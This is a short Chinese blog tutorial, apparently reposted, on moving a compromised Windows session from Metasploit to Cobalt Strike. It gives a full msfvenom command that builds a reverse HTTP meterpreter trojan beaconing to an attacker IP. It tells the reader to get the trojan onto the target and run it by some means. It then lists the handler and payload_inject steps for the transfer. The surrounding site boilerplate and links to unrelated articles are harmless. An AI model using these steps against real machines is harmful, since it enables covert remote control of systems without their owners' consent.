Meteasploit -> CS 【会话转移】
2021/8/31 17:36:19
本文主要是介绍Meteasploit -> CS 【会话转移】,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
流程:
大致流程,msfvenom生成木马->目标机运行木马->msf监听到会话->转移到CS
开始:
先让服务端的CS上线
cs客户端连接cs服务端
cs设置监听
生成木马 msfvenom -p windows/x64/meterpreter_reverse_http lhost=104.xx.xx.xx lport=6677 -f exe -o msf1.exe
生成后开启监听模块
查看详细常数
设置set exitonsession false
exploit -j 开始执行
然后把木马msf1.exe想办法弄到目标机上且运行起来,拿到会话如下
拿到回话之后,重新设置新模块use exploit/windows/local/payload_inject
设置参数
设置完毕后开始执行!run
转移成功
这篇关于Meteasploit -> CS 【会话转移】的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-09CMS内容管理系统是什么?如何选择适合你的平台?
- 2025-01-08CCPM如何缩短项目周期并降低风险?
- 2025-01-08Omnivore 替代品 Readeck 安装与使用教程
- 2025-01-07Cursor 收费太贵?3分钟教你接入超低价 DeepSeek-V3,代码质量逼近 Claude 3.5
- 2025-01-06PingCAP 连续两年入选 Gartner 云数据库管理系统魔力象限“荣誉提及”
- 2025-01-05Easysearch 可搜索快照功能,看这篇就够了
- 2025-01-04BOT+EPC模式在基础设施项目中的应用与优势
- 2025-01-03用LangChain构建会检索和搜索的智能聊天机器人指南
- 2025-01-03图像文字理解,OCR、大模型还是多模态模型?PalliGema2在QLoRA技术上的微调与应用
- 2025-01-03混合搜索:用LanceDB实现语义和关键词结合的搜索技术(应用于实际项目)